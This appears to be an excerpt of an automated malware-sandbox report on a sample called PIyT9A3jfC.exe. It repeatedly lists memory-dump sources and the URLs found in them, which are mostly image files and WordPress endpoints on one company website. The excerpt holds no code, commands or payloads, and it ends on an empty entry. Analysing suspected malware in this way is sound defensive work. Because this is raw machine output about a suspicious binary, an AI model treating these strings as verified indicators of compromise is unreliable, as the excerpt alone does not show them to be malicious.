                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_6.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile123.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile234.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile456ENDE.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobilr567.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/N123.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/SimonJabocWEBDE.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitBROWN-1.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitgreen-1.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-180x180.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-192x192.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-270x270.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-32x32.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/feliwegerDEweb.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/mobileChristianDEfr.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/nandakamrathENundDEweb-1.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205-1.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205DEmobile.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 